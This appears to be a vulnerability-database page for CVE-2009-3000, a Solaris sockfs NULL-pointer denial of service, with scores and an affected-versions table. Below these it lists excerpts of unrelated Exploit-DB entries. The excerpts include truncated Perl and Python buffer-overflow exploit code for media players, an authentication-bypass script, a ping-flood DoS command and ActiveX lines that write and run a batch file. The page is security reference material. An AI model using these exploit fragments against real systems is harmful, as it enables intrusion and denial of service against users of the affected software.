CVE-2009-3000
published 2009-08-28CVE-2009-3000: The sockfs module in the kernel in Sun Solaris 10 and OpenSolaris snv_41 through snv_122, when Network Cache Accelerator (NCA) logging is enabled, allows…
PriorityP426high7.1CVSS 2.0
AVNACMAuNCNINAC
EPSS
1.56%
72.3th percentile
The sockfs module in the kernel in Sun Solaris 10 and OpenSolaris snv_41 through snv_122, when Network Cache Accelerator (NCA) logging is enabled, allows remote attackers to cause a denial of service (panic) via unspecified web-server traffic that triggers a NULL pointer dereference in the nl7c_http_log function, related to "improper http response handling."
Affected
83 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
| sun | opensolaris | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Asx to Mp3 2.7.5 - Local Stack Overflow
exploitdb·2014-10-07
CVE-2009-1324 Asx to Mp3 2.7.5 - Local Stack Overflow
Asx to Mp3 2.7.5 - Local Stack Overflow
---
###########################################################################################
# Exploit Title: ASX to MP3 Converter 2.7.5 stack buffer overflow
# Date: 6 Oct 2014
# Exploit Author: Amir Reza Tavakolian
# Vendor Homepage: http://binarylife.blog.ir/
# Software Link: http://download.cnet.com/ASX-to-MP3-Converter/3000-2168_4-10385919.html
# Version: 2.7.5
# Tested on: windows xp sp 3
#
#
# Special thanks to Mr Michael Czumak (T_v3rn1x) for his tutorial in securitysift.com.
# Thanks Mike. :)
##########################################################################################
#!/usr/bin/perl
my $junk = "\x41" x 35056;
my $eip = pack ('V', 0x73e848a7);
my $nop = "\x90" x 4;
my $shellcode = "\x90" x 25;
$shellcode = $shellcode
Exploit-DB
TEKUVA - Password Reminder Authentication Bypass
exploitdb·2009-11-21
CVE-2009-4781 TEKUVA - Password Reminder Authentication Bypass
TEKUVA - Password Reminder Authentication Bypass
---
#!/usr/bin/perl
# Exploit: TEKUVA Password Reminder Authentication Bypass
# Date: [11/19/2009]
# Author: iqlusion [[email protected]]
# Software Link: http://download.cnet.com/Password-Reminder/3000-2064_4-10966598.html
# Version: 1.0.0.1
# Info: TEKUVA Password Reminder is a password vault that allows you to store all
# your credentials in one spot and all you have to remember is a single 'main'
# password to access your vault. Unfortunately, the vault is actually an
# Access 2007 database that is protected by a password which is hard coded into
# the program, not your main password.
#
# This script connects to the database using the hard coded db password and dumps
# everything into an HTML table, bypassing the need to enter th
Exploit-DB
Linux Kernel 2.6.x - '/drivers/net/r8169.c' Out-of-IOMMU Error Local Denial of Service
exploitdb·2009-08-28
CVE-2009-3613 Linux Kernel 2.6.x - '/drivers/net/r8169.c' Out-of-IOMMU Error Local Denial of Service
Linux Kernel 2.6.x - '/drivers/net/r8169.c' Out-of-IOMMU Error Local Denial of Service
---
source: https://www.securityfocus.com/bid/36706/info
The Linux kernel is prone to a local denial-of-service vulnerability that attackers can exploit to cause an affected computer to panic.
Versions prior to the Linux kernel 2.6.26.4 are affected.
The following example is available:
ping -f -s 3000
Exploit-DB
KSP 2006 FINAL - '.m3u' Universal Local Buffer (SEH)
exploitdb·2009-08-24
CVE-2009-4964 KSP 2006 FINAL - '.m3u' Universal Local Buffer (SEH)
KSP 2006 FINAL - '.m3u' Universal Local Buffer (SEH)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# KSP 2006 FINAL ( .M3U) Universal Local Buffer Exploit (SEH)
# http://download.cnet.com/KSP/3000-2139_4-10540099.html?tag=mncol
# ## easy #### this work sooooooooo good############################
####################################################################
# USE>>KSP>>PLAYLIST>>LOAD>>HACK4LOVE.M3U>> >BOOM CALC
####################################################################
# INFO::WE HAVE ONLEY 192 BIT FOR shellcode SO I USE
## win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub
#####################################################################
###HAPEY _________RAMADAN############################################
#################################
Exploit-DB
A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow (SEH)
exploitdb·2009-08-06
CVE-2009-4549 A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow (SEH)
A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# A2 Media Player ProV2.51(.m3u /m3l)Universal Local Buffer Exploit (SEH)
# ## easy #### this work sooooooooo good####################################
############################################################################
##Thanks for WwW.Sec-ArT.CoM/cc team ##and 3asfh.net team###################
##AND special THANKS FOR His0k4 i respect him so much god with him #########
############################################################################
# http://download.cnet.com/A2-Media-Player-Pro/3000-2141_4-10059847.html
############################################################################
my $bof="\x41" x 4103;
my $nsh="\xEB\x06\x90\x90"
Exploit-DB
UltraPlayer Media Player 2.112 - Local Buffer Overflow (PoC)
exploitdb·2009-08-05
CVE-2009-4863 UltraPlayer Media Player 2.112 - Local Buffer Overflow (PoC)
UltraPlayer Media Player 2.112 - Local Buffer Overflow (PoC)
---
#!/usr/bin/perl
#UltraPlayer Media Player 2.112
#Coded by SarBoT511
#Download : http://download.cnet.com/UltraPlayer-Media-Player/3000-2139_4-10041974.html?tag=mncol
#GreatZ [ 2] : nEt^DeV!L [s4udi~cod3r] , dev1l fucker , The gobL!n , alM511 , BlacK_Zero , l!NUX_dROUx,HCJ.
#The Bug in thes place (C:\Program Files\UltraPlayer\Skins\Derailer.usk)
#EAX 00EDFBC0
#ECX 000002F4
#EDX 00000000
#EBX 41414141
#ESP 0012FB78
#EBP 0012FB80
#ESI 00EDEFF0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDI 00000000
#EIP 00471733 UPlayer.0047
Exploit-DB
WOW Web On Windows ActiveX Control 2 - Remote Code Execution
exploitdb·2009-01-29
CVE-2009-0389 WOW Web On Windows ActiveX Control 2 - Remote Code Execution
WOW Web On Windows ActiveX Control 2 - Remote Code Execution
---
Written By Michael Brooks
Special thanks to str0ke!
software:WOW - Web On Windows ActiveX Control 2 - Remote Code Execution
exploit type: Remote File Upload and Remote Code Execution
Download: http://www.download.com/WOW-Web-On-Windows-ActiveX-Control/3000-2206_4-10049976.html
183,682 downloads at the time of publishing this exploit.
This entire dll is full of bad functions, including read write access
to the registry.
This must have been accidentally registered to IE's ActiveX interface.
obj.WriteIniFileString("C:\\hack.bat","","calc.exe ","");
obj.ShellExecute(0,"open","hack.bat",0,"C:\\",0);
# milw0rm.com [2009-01-29]
Exploit-DB
Triologic Media Player 7 - '.m3u' Local Heap Buffer Overflow (PoC)
exploitdb·2009-01-12
CVE-2009-0266 Triologic Media Player 7 - '.m3u' Local Heap Buffer Overflow (PoC)
Triologic Media Player 7 - '.m3u' Local Heap Buffer Overflow (PoC)
---
# IN THE NAME OF ALLAH :)
#!/usr/bin/python
# Discovered By : zAx
# Download Application : http://www.download.com/Triologic-Media-Player/3000-2139_4-10601848.html?tag=mncol
print "**************************************************************************"
print " Triologic Media Player 7 (.m3u) Local Heap Buffer Overflow PoC\n"
print " Discovered By : zAx\n"
print " [email protected]\n"
print " In that PoC thanks for : Stack ;) My BrOthEr :)"
print "**************************************************************************"
overflow = "\x41" * 3000 # not right, just a PoC
try:
out_file = open("zAx.m3u",'w')
out_file.write(overflow)
out_file.close()
raw_input("\nPoC file created!, Now go to the program and click
2009-08-28
Published